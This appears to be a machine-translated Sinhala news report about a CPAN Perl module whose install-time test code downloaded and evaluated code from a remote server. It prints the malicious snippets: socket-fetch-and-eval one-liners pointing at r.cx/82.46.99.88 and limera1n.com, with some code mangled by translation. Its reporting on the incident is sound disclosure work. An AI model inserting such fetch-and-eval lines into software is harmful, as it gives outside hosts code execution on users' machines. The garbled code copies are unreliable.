CPAN නාමාවලිය හරහා බෙදා හරින ලද Perl පැකේජයක , පියාසර කරන විට CPAN මොඩියුල ස්වයංක්රීයව පූරණය කිරීමට නිර්මාණය කර ඇත, අනිෂ්ට කේතය. ද්වේෂසහගත ඇතුළත් කිරීම විය පරීක්ෂණ කේතයේ , 2011 සිට නැව්ගත කර ඇත.
සැක සහිත කේතය පැටවීම පිළිබඳ ප්රශ්න මතු වූ බව සැලකිය යුතු කරුණකි ආපසු 2016 දී.
මොඩියුලය ස්ථාපනය කරන විට දියත් කරන ලද පරීක්ෂණ කට්ටලයක් ක්රියාත්මක කිරීමේදී තුන්වන පාර්ශ්ව සේවාදායකයකින් (http://r.cx:1/) කේත බාගත කර ක්රියාත්මක කිරීමට දරන උත්සාහයක් දක්වා අනිෂ්ට ක්රියාකාරකම් පහත වැටේ. මුලින් බාහිර සේවාදායකයෙන් බාගත කළ කේතය අනිෂ්ට නොවන බව උපකල්පනය කෙරේ, නමුත් දැන් ඉල්ලීම ක්රියාත්මක කිරීම සඳහා එහි කේතයේ කොටස සපයන ww.limera1n.com වසම වෙත හරවා යවනු ලැබේ.
ගොනුවක් තුළ බාගත කිරීම සංවිධානය කිරීමට පහත කේතය භාවිතා වේ:
මගේ $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
මගේ $ උත්සාහය = `$^X $prog`;
නිශ්චිත කේතය ස්ක්රිප්ට් ක්රියාත්මක කිරීමට හේතු වේ , එහි අන්තර්ගතය රේඛාවට අඩු කර ඇත:
lib do{eval<$b>&&botstrap("RCX")if$b=නව IO::Socket::INET 82.46.99.88.":1″} භාවිතා කරන්න;
මෙම ස්ක්රිප්ට් පූරණය වේ සේවාව භාවිතා කරමින් බාහිර සත්කාරක r.cx වෙතින් කේතය (අක්ෂර කේත 82.46.99.88 "R.cX" පෙළට අනුරූප වේ) සහ එය eval block හි ක්රියාත්මක කරයි.
$ perl -MIO::Socket -e'$b=නව IO::Socket::INET 82.46.99.88.":1″; මුද්රණය <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
අසුරන ලද පසු, පහත සඳහන් දේ අවසානයේ ක්රියාත්මක වේ: :
මුද්රණය{$b=නව IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
ගැටළු සහගත පැකේජය දැන් ගබඩාවෙන් ඉවත් කර ඇත. (Perl Authors Upload Server), සහ මොඩියුල කර්තෘගේ ගිණුම අවහිර කර ඇත. මෙම අවස්ථාවේදී, මොඩියුලය තවමත් පවතී MetaCPAN සංරක්ෂිතයේ ඇති අතර cpanminus වැනි සමහර උපයෝගිතා භාවිතයෙන් MetaCPAN වෙතින් සෘජුවම ස්ථාපනය කළ හැක. පැකේජය පුළුල් ලෙස බෙදා හැර නොමැති බවයි.
සාකච්ඡා කිරීමට සිත්ගන්නා සුළුය සහ මොඩියුලයේ කතුවරයා, ඔහුගේ වෙබ් අඩවිය "r.cx" හැක් කිරීමෙන් පසු අනිෂ්ට කේතය ඇතුළත් කළ බවට තොරතුරු ප්රතික්ෂේප කළ අතර ඔහු විනෝදජනක බව පැහැදිලි කළ අතර, perlobfuscator.com භාවිතා කළේ යමක් සැඟවීමට නොව ප්රමාණය අඩු කිරීමට ය. කේතයේ සහ පසුරු පුවරුව හරහා එය පිටපත් කිරීම සරල කිරීම. "botstrap" යන ශ්රිත නාමයේ තේරීම පැහැදිලි වන්නේ මෙම වචනය "bot වැනි ශබ්දයක් වන අතර bootstrap වලට වඩා කෙටි වේ" යන කාරනයෙනි. හඳුනාගත් උපාමාරු අනිෂ්ට ක්රියාවන් සිදු නොකරන බවට මොඩියුලයේ කතුවරයා සහතික විය, නමුත් TCP හරහා කේතය පැටවීම සහ ක්රියාත්මක කිරීම පමණක් පෙන්නුම් කරයි.
මූලාශ්රය: opennet.ru